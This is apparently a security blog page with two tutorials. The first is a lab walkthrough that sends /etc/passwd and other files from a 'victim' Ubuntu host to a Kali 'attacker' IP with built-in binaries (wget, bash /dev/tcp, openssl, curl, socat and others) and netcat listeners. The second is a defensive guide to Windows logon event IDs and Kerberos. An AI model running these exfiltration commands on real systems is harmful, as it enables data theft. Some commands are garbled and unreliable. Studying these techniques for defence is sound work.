Data Exfiltration using Linux Binaries

Have you ever heard about your critical data being exported somewhere else without your knowledge? Data exfiltration is a method of breaching the security and having illegal access over the data of the user’s system or a server.

Table of Contents

·         Introduction to

o   Data exfiltration

o   Linux Binaries

·         Data exfiltration using Default Linux Binaries

o   /cancel

o   /wget

o   /whois

o   /bash

o   /openssl

o   /busybox

·         Data exfiltration using apt-installed Linux binaries

o   /curl

o   /finger

o   /irb

o   /ksh

o   /php

o   /socat

Introduction to Data Exfiltration

Data exfiltration in simpler terms is also known as Data Theft or Data Exportation. These terms generally define the method of attackers having unauthorized access to a user’s data and sneakily make a copy of it by gaining access to the system or the network. Data exfiltration can be performed in various methods with their primary intent of stealing data.  This form of attack usually goes undetected. In this article, we are going to learn about data exfiltration by using Linux binaries.

Introduction to Linux Binaries

Binaries can be described as files that contain source codes compiled together. These binary files are also called as executables files, as they can be executed in the system.  Here, we will be using file uploading binaries to perform data exfiltration. This article is divided into two part;

·         Data exfiltration using default Linux Binaries

·         Data exfiltration using apt-installed Linux binaries

Now, switch on the Linux operating systems i.e. Kali Linux and Ubuntu. We will simultaneously see one of the two systems posing as an attacker and the other as a victim.

Data exfiltration using default Linux Binaries

/Cancel

We can use /cancel binary to sneakily use file upload and send the file to the attacker machine over TCP connection.

Victim Machine

Here the Ubuntu system is the victim machine. To upload the file from the victim system to the attacker system by entering the file to upload, the victim IP, and the remote port for file transfer. To perform data exfiltration you can type

cancel -u "$(cat /etc/passwd)" -h 192.168.0.147:1234

Attacker Machine

Here the Kali Linux is used as the attacker machine that uses port 1234 for listening using Netcat, you can use

nc -lvp 1234

Here you see that the contents of the file /etc/passwd with all the users are listed.

/wget

It is a computer program that usually retrieves content from web servers.  We can use /wget binary to sneakily use file upload and send the file to the attacker machine over HTTP POST.

Victim Machine

Here we use Ubuntu on our victim machine and send local file with an HTTP POST request. To implement this, you can use the command

wget --post-file=/etc/passwd 192.168.0.147

Attacker Machine

Here we are using Kali Linux as the attacker machine. To get the file, Netcat is used as a listener, and type this command,

nc -lvp 1234

Here you see that the contents of the file /etc/passwd with all the users are listed on the attacker machine.

/whois

We can use /whois binary to sneakily use file upload and send the file to the attacker machine over TCP connection.

Victim Machine

Here the Ubuntu system is the victim machine. To upload the file from the victim system to the attacker system by entering the file to upload, the victim IP, and the remote port for file transfer. To perform data exfiltration, you can type

whois -h $192.168.0.147 -p 43 `cat  /etc/passwd`

Attacker Machine

Here the Kali Linux is used as the attacker machine that uses port 43 for listening using Netcat, you can use

nc -lvp 43

Here you see that the contents of the file /etc/passwd with all the users are listed.

/bash

It is a Unix shell and command language We can use /bash binary to sneakily use file upload and send the file to the attacker machine over HTTP POST.

Victim Machine

Here we have made use of the Ubuntu system as the victim machine. To upload the file from the victim system to the attacker system by entering the file to upload, the victim IP, and the remote port for file transfer. To perform data exfiltration, you can type

bash -c 'echo -e "POST / HTTP/0.9\n\n$(

/dev/tcp/192.168.0.147/1234’

Attacker Machine

Here the Kali Linux is used as the attacker machine that uses port 1234 for listening using Netcat, you can use

nc -lvp 1234

Here you see that the contents of the file /etc/passwd with all the users are listed.

/OpenSSL

OpenSSL is a robust, highly -featured toolkit for the TLS and SSL protocols.  We can use /openssl binary to use for file upload and send the file to the attacker machine over TCP connection.

Victim Machine

Here we have made use of the Ubuntu system as the victim machine. To upload the file from the victim system to the attacker system by entering the file to upload, the victim IP, and the remote port for file transfer. To perform data exfiltration, you can type

openssl s_client -quiet -connect 192.168.0.147:1234 < "/etc/passwd"

Attacker Machine

Here we are using, Kali Linux as the attacker machine. In order to download the file on the attacker machine, you can type;

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 > passwd

To check the contents of the file, you can type;

cat passwd

/busybox

It is a software suite that provides various linux utilities in a single executable file. We can use /busybox binary to sneakily use file upload and send the file to the attacker machine over HTTP.  

Victim Machine

Here the Ubuntu system is the victim machine. To upload the file from the victim system to the attacker system serve files in the local folder by running an HTTP server, you can type

busybox httpd -f -p 8080 -h

Attacker Machine

Here we are using, Kali Linux as the attacker machine. In order to download the file on the attacker machine, you can type;

wget http://192.168.0.196:8080/data.txt

To read the contents of the file, type

cat data.txt

/nc

Netcat is a command-line tool for reading, writing, redirecting, and encrypting data across a network. We can use /nc binary to sneakily use file upload and send the file to the attacker machine over the Tcp connection.  

Victim Machine

Here we are using, Kali Linux as the victim machine. To upload the file from the victim system to the attacker system serve files in the local folder by running an TCP, you can type;

nc -lvp 5555 < jeeni.txt

Attacker Machine

Here we are using, Ubuntu as the attacker machine. In order to download the file on the attacker machine, you can type;

nc 192.168.0.147 5555 > jeeni.txt

to read the contents of the file, type

cat jeeni.txt

Data exfiltration using apt-installed Linux binaries

/curl

It is a command-line tool that is used for transferring data using various network protocols. We can use /curl binary to sneakily use file upload and send the file to the attacker machine over the HTTP POST connection. So, the first step would be to install curl binary using apt.

Victim Machine

Here the Ubuntu system is the victim machine. To upload the file from the victim system to the attacker system serve files in the local folder by running an HTTP Post request, you can type;

curl -X POST -d @data.txt 192.168.0.147

Attacker Machine

Here we are using, Kali Linux as the attacker machine. In order to download the file on the attacker machine, you can type;

nc -lvp 80 > data.txt

To read the file, type

cat data.txt

/finger

It is a program you can use to find information about computer users. We can use /finger binary to sneakily use file upload and send the file to the attacker machine over the TCP connection. So, the first step would be to install finger binary using apt.

Victim Machine

Here the Ubuntu system is the victim machine. To upload the file from the victim system to the attacker system serve files in the local folder by running the TCP request, you can type;

finger "$(cat /etc/passwd)@192.168.0.147"

Attacker Machine

Here we are using, Kali Linux as the attacker machine. In order to download the file on the attacker machine, you can type

nc -lvp 79

You can see the user accounts from the /etc/passwd.

/irb

It is a tool to execute interactively ruby expressions read from stdin. We can use /irb binary to sneakily use file upload and send the file to the attacker machine over the HTTP. So, the first step would be to install irb binary using apt.

Victim Machine

Here the Ubuntu system is the victim machine. To upload the file from the victim system to the attacker system serve files in the local folder by running the HTTP server on port 8888, you can type;

Irb

require 'webrick'; WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start;

Attacker Machine

Here we are using, Kali Linux as the attacker machine. In order to download the file on the attacker machine, in the browser you can type

192.168.0.196:8888

/ksh

KornSHell is a shell and programming language that executes commands read from a terminal or a file We can use /ksh binary to sneakily use file upload and send the file to the attacker machine over the HTTP. So, the first step would be to install ksh binary using apt.

Victim Machine

Here the Ubuntu system is the victim machine. To upload the file from the victim system to the attacker system serve files in the local folder by running the HTTP server on port 1234, you can type;

ksh -c 'cat /etc/passwd > /dev/tcp/192.168.0.147/1234'

Attacker Machine

Here we are using, Kali Linux as the attacker machine. In order to download the file on the attacker machine, in the browser you can type

nc -lvp 1234

/PHP

It is a scripting language that is especially suited to web development. We can use /PHP binary to sneakily use file upload and send the file to the attacker machine over the HTTP. So, the first step would be to install the php binary using apt.

Victim Machine

Here the Ubuntu system is the victim machine. To upload the file from the victim system to the attacker system serve files in the local folder by running the HTTP server on port 8080, you can type;

PHP -S 0.0.0.0:8080

Attacker Machine

Here we are using, Kali Linux as the attacker machine. In order to download the file on the attacker machine, in the browser you can type

wget 192.168.0.196:8080/data.txt

/ socat

It is a utility for data transfer between two addresses We can use /socat binary to sneakily use file upload and send the file to the attacker machine over the TCP. So, the first step would be to install the socat binary using apt.

Victim Machine

Here the Ubuntu system is the victim machine. To upload the file from the victim system to the attacker system serve files in the local folder by running TCP on port 1234, you can type;

socat -u file:/etc/passwd TCP-connect:192.168.0.147:1234

Attacker Machine

Here we are using, Kali Linux as the attacker machine. In order to download the file on the attacker machine, in the browser you can type

192.168.0.196:1234

You can try out other Linux binaries for data exfiltration from https://gtfobins.github.io/

Incident Response: Windows Account Logon and logon Events

A user when authenticates a Windows endpoint, then an Account Logon event will be generated and will be recorded. These account logon events will be recorded in the Security event log of the system which will be responsible for authentication of the user.

On accessing an account for a resource, a Logon event will be recorded. These logon events will be recorded in the Security event log of the system being accessed.

As an incident responder, if you spot account logon events on a machine other than the Domain Controller, it could be a sign of local user account usage.

Local user account usage is abnormal on domain environments and can indicate a compromise

Table of Contents

·        Introduction

·        Logon Events

·        Account Logon Events

·        Event ID’s

·         Event ID 4624

·         Event ID 4625

·         Event ID 4634

·         Event ID 4647

·         Event ID 4648

·         Event ID 4672

·        Kerberos Authentication Protocol

·         Event ID 4768

·         Event ID 4769

·         Event ID 4776

·         Event ID 4778

·         Event ID 4779

Introduction

A windows system has various authentication and logon methods to establish remote sessions between different systems over a network. In this article, we will be learning about different account logon events and authentication protocols like Kerberos.

The methods of Windows authentication range from a simple logon-based thing depending on the user’s knowledge like a password, tokens, public key certificates, and biometrics, etc.

An authentication protocol like Kerberos defines rules and conventions and serves the authentication of users, computers, and services. The process of authentication allows an authorized user and services and gives access to resources in a much secure way.

Logon Events

The Audit logon events are usually settings in the policy that records all attempts to log on to the local computer, whether by using a domain account or a local account. Audit Logon/Logoff events generate on the creation and destruction of logon sessions.  These events occur on the machine that was accessed. 

Account Logon

Account Logon policy setting generates events for any type of credential validation. These events occur on the machine that is authoritative for the credentials. For domain accounts, the domain controller is authoritative. For local accounts, the local machine is authoritative.

So, let’s see these event IDs one by one across the Windows server.

Event ID 4624

This event usually is generated for a successful logon. This event will contain information about the host and the name of the account involved. For remote logons, an incident responder should focus on the Network Information section of the event description for remote host information.

The fields Caller Process Name and Caller Process ID in the Process Information section of this event description provides more details about the process of initiating the logon.

When a user successfully logs on to a computer, this event will be generated.

Event ID 4625

This event is created on a failed logon attempt. Usually, these logs in a network may indicate password guessing attacks. The Network Information of this event can provide valuable information if a remote host is attempting to log on to the system.

As an incident responder, you can determine more about the reason for the failure by going through the description.

When a user has a failed login attempt on to a computer, this event will be generated.

 

Event ID 4634

When a user logs off from his system, it is recorded by Event ID 4634. If a system doesn’t show an event showing a logoff, you as an incident responder you should not be considered overly suspicious.

Event ID 4647

This event is usually triggered, when no user-initiated activities no longer occur. This is different from event 4634, that is generally generated when a session no longer exists because of termination.

This event generates when a user logon is of remote type and the logoff was with some standard method. 

Event ID 4648

A logon was attempted using explicit credentials. When a user attempts to use credentials that are of other than his, or if there is a user account control by pass to open a process with administrator permissions, this event is logged.

Event ID 4672

When a set of sensitive privileges are assigned to a new logon session, this event is generated for that particular new logon. This event is usually recorded in the event viewer as and when a single local system account logon triggers this event.

Kerberos Authentication Protocol

Kerberos is an authentication protocol that works on the basis of tickets that allows the nodes to communicate over a non-secure network to prove their identity to each other in a secure manner. 

So, let us understand the basics of Kerberos and then go ahead with Kerberos authentication protocol and the proceed with the event logs.

Client: A user that requests communication service request.

Resource Server: The server with the service the user wants to access.

Authentication Sever: It performs client authentication, issues TGS on successful authentication.

Key Distribution Centre: Database, Authentication Server and Ticket Granting Server collectively is called Key Distribution Centre.

Ticket Granting Server:  It is an application server that provides the issuing of service tickets as a service.

Event ID 4768

On successful issuance of a TGT, it will show that that a user account was authenticated by the domain controller. The Keywords field would indicate whether the authentication attempt was successful or failed.

Event ID 4769

Once the client successfully receives a ticket-granting ticket from the KDC, it will store that TGT and send it to the TGS with the Service Principal Name (SPN) of the resource that the client wants to access. TGTs are valid for a certain period of time only.

Event ID 4776

When the computer logon is to be verified, this even is created. It contains additional information about the remote host in the event of a remote logon attempt. The Keywords field indicates whether the authentication attempt succeeded or failed

Event ID 4778

This event is created when a session is reconnected to a Windows station. If a user reconnects with an existing Terminal Services session, or switches to an existing desktop using Fast User Switching, event 4778 is generated. This event is also triggered when a user reconnects to a virtual host.

Event ID 4779

If a user disconnects from an existing Terminal Services session, or switches away from an existing desktop using Fast User Switching, this event is generated. This event is also created when a user disconnects from a virtual host.

You can also try out some other event ID’s from below.